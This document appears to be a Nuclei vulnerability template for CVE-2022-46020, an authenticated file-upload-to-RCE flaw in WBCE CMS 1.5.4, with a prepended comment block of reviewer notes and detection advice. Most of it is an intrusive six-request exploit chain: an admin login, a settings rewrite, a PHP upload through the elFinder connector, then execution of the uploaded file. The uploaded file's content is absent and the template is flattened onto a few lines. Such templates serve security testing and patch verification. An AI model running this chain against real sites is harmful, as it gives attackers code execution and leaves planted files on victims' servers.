# Template record for CVE-2022-46020 (WBCE CMS v1.5.4, CWE-434 unrestricted file upload).
# The layout (`{{Hostname}}`, `raw:` request list, matchers/extractors, trailing `# digest:`)
# looks like a Nuclei template. As rendered here the whole document is collapsed onto three
# physical lines, so it will not parse as YAML until the upstream line breaks are restored;
# nothing below has been reflowed or otherwise altered.
#
# Request flow, as far as the visible text shows: (1) GET the admin login form, (2) POST the
# login using the field names pulled out by the `username_fieldname`/`password_fieldname`
# extractors plus the {{username}}/{{password}} template variables, (3) GET the advanced
# settings page (source of the `formtoken` and `app_name` extractors), (4) POST to
# /admin/settings/save.php, which rewrites the site settings (the description says this is
# where the permitted upload file types are changed), (5) multipart upload of
# "{{randstr}}.php" through /modules/elfinder/ef/php/connector.wbce.php, (6) GET
# /media/{{randstr}}.php. The success condition is a fixed token (751a8ba5...) in the body
# of response 6 together with a text/html header and status 200 — i.e. the uploaded PHP
# file was executed by the server.
#
# Review notes:
# - Authenticated and intrusive, matching the tags: it needs admin credentials, it persists
#   new site settings in request 4 (e.g. website_title=test), and it leaves a PHP file under
#   /media/ that none of the six requests removes.
# - The cvss-metrics vector says PR:N (no privileges required) while the template itself
#   only works with a valid admin login; the vector is reproduced from NVD as-is, but the
#   mismatch is worth knowing when triaging exposure.
# - In the request-4 body, `§ion_blocks` looks like an HTML-entity rendering artifact of the
#   page extraction rather than a real parameter name — verify against the upstream template
#   before relying on this copy.
# - In request 5, the `upload[]` part has a Content-Type header but no visible file body; the
#   payload text appears to have been dropped in this rendering (presumably it is what makes
#   response 6 contain the matched token). It is deliberately not reconstructed here.
# - Detection for defenders: an authenticated POST to /admin/settings/save.php followed by an
#   elfinder connector `upload` with a .php filename and then a request for /media/*.php is
#   the sequence to alert on; the remediation field (upgrade to 1.5.5 or later) is the fix.
# - The trailing `# digest:` line looks like a signature over the template text; any edit to
#   the file (including adding these comments) would presumably require re-signing.
id: CVE-2022-46020 info: name: WBCE CMS v1.5.4 - Remote Code Execution author: theamanrawat severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: - https://github.com/WBCE/WBCE_CMS - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf - https://nvd.nist.gov/vuln/detail/CVE-2022-46020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 epss-score: 0.01123 epss-percentile: 0.82955 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: wbce product: wbce_cms tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive http: - raw: - | GET /admin/login/index.php HTTP/1.1 Host: {{Hostname}} - | POST /admin/login/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login - | GET /admin/settings/index.php?advanced=yes HTTP/1.1 Host: {{Hostname}} - | POST /admin/settings/save.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded 
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload= - | POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988 -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="reqid" test -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="cmd" upload -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="target" l1_Lw -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php" Content-Type: application/x-php -----------------------------213974337328367932543216511988 Content-Disposition: form-data; name="mtime[]" test -----------------------------213974337328367932543216511988-- - | GET /media/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body_6 words: - 751a8ba516522786d551075a092a7a84 - type: word part: header words: - text/html - type: status status: - 200 extractors: - type: regex name: username_fieldname group: 1 
regex: - name="username_fieldname" value="(.*)" internal: true part: body - type: regex name: password_fieldname group: 1 regex: - name="password_fieldname" value="(.*)" internal: true part: body - type: regex name: formtoken group: 1 regex: - name="formtoken" value="(.*)" internal: true part: body - type: regex name: app_name group: 1 regex: - name="app_name" value="(.*)" internal: true part: body # digest: 4a0a00473045022100b9943c540bab2410e059b6047c421e50b85f4b37d8f79ee1444c0d3e6d670ef8022044d41206ee6fe15810691c5c77d42c8ddaa15cce030423cd258057a4f25c22fe:922c64590222798bb761d5b6d8e72950